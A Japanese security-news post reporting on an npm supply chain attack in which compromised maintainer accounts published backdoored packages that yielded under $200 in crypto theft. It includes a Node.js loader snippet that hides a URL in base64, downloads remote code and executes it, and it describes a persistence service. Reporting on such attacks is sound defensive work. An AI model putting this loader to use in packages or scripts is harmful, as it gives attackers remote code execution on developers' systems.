npm エコシステムを狙ったサプライチェーン攻撃:収益は $200 未満だったが狙いは別のところに?

Hackers Booked Very Little Profit with Widespread npm Supply Chain Attack

2025/09/11 CyberSecurityNews — 8月下旬に表面化した高度な npm サプライチェーン攻撃は、人気の JavaScript ライブラリに悪意のペイロードを挿入し、数千の下流プロジェクトを標的としたものである。当初の報告では、タイポスクワッティング手法の新たな亜種が指摘されていたが、その後の分析で、侵害されたメンテナの認証情報を用いて、バックドア付きモジュールを正規パッケージ名で公開するという、より精巧な攻撃であることが明らかになった。

この攻撃はエコシステム全体に急速に拡散し、エンタープライズ SaaS プラットフォーム/開発者ツール/教育プロジェクトなどのアプリケーションにも影響を与えた。Wiz.io の研究者たちが確認したのは、無害に見えるライブラリを更新した直後に、 CI パイプラインで発生した異常なネットワーク・アクティビティである。初期テレメトリーではデータ流出が示唆されたが、詳細な検証により判明したのは、一連のペイロードは条件付きルーチンのみを実行し、破壊的な行為を回避していたことだ。

ただし、実際には、この悪意のコードは環境変数をサンプリングし、システム・メタデータを記録し、攻撃者の管理下のドメインから二次ペイロードを取得する準備を行っていた。この攻撃者の狙いは、検出されやすい異常を最小限に抑え、定期的なパッケージ更新や綿密なバージョン管理に溶け込むことで、永続性を維持することだった。影響評価で判明したのは、メンテナが影響を受けたバージョンをロールバックするまでの時間の中で、4,500以上のプロジェクトにおいて、少なくとも1つの侵害されたリリースが取得されていたことだ。

Impact of hacked popular npm packages (Source – Wiz.io)

このような広範な影響が生じた一方で、今回の攻撃キャンペーンに関連するブロックチェーン決済チャネルと暗号通貨ウォレットを分析した結果として判明したのは、完了した取引の総額が $200 未満という僅かなものであったことだ。この金銭的な利益の低さが示唆するのは、攻撃者が即時的な収益化より、偵察や足掛かり確立に関心を持っていることであり、サプライチェーン脅威における動機の変化を浮き彫りにしている。

その後に Wiz.io のアナリストたちが特定したのは、一般的な CI ログに埋め込まれた、難読化された URL/Base64 エンコードデータブロックなどの、より複雑なマルウェア・ファミリーの初期段階を示す追加の IoC である。この発見を受けて強化されたのは、パイプライン・スクリプトへの迅速なパッチ適用と、主要開発チームにおける npm レジストリ認証情報の精査である。

感染メカニズムと持続性

一連の悪意のパッケージは、無害に見えるインストール後のスクリプトから始まる、多段階感染メカニズムを採用していた。インストールされると、Node.js で記述された小型ローダーが実行される。

// Figure1_loader.js
const https = require('https');
const { exec } = require('child_process');

const payloadUrl = Buffer.from('aHR0cHM6Ly9lbWFpbC5hZGRyZXNzLmNvbS9sb2FkZXIuanM=', 'base64').toString();
https.get(payloadUrl, (res) => {
  let data = '';
  res.on('data', (chunk) => data += chunk);
  res.on('end', () => {
    exec(data, (error, stdout, stderr) => {
      if (error) console.error(stderr);
      else console.log(stdout);
    });
  });
});

それにより攻撃者は、Base64 エンコードで実際のダウンロード URL を隠蔽し、単純な文字列照合による防御を回避している。二次ペイロードを取得した後に、このローダーは Node.js サービス・ファイルをユーザー・ホーム・ディレクトリに書き込み、システム再起動時に自動実行されるよう設定する。

このサービスは、パッケージ削除やレジストリ・クリーンアップの後にも存続する永続レイヤーを導入し、侵害した開発環境への長期的なアクセスを、攻撃者に許可するものだ。つまり、無害に見えるスクリプトと暗号化ステージングの連鎖により、この攻撃キャンペーンは一般的な検出メカニズムを回避している。それが浮き彫りにするのは、サプライチェーン脅威の高度化である。

今回の記事は、2025年8月に発生した、npm ライブラリへのサプライチェーン攻撃の手口について詳しく説明しています。この問題のコアは、正規のメンテナの認証情報が侵害され、その権限を利用して改竄済みのパッケージが、正規の名前で公開された点にあります。外見上は通常の更新に見えるため、開発者は無意識のうちに悪意あるコードを取り込んでしまうという状況でした。この侵害については、2025/09/09 の「人気の npm パッケージ 18種類にマルウェア侵害:それらの総ダウンロード数は 20億回/週」に、詳細が記されています。そして、今回の記事が示唆するのは、被害総額が $200 未満であっても、この暗号通貨の窃取だけが、攻撃者の目的ではないという点です。よろしければ、npm で検索も、ご参照ください。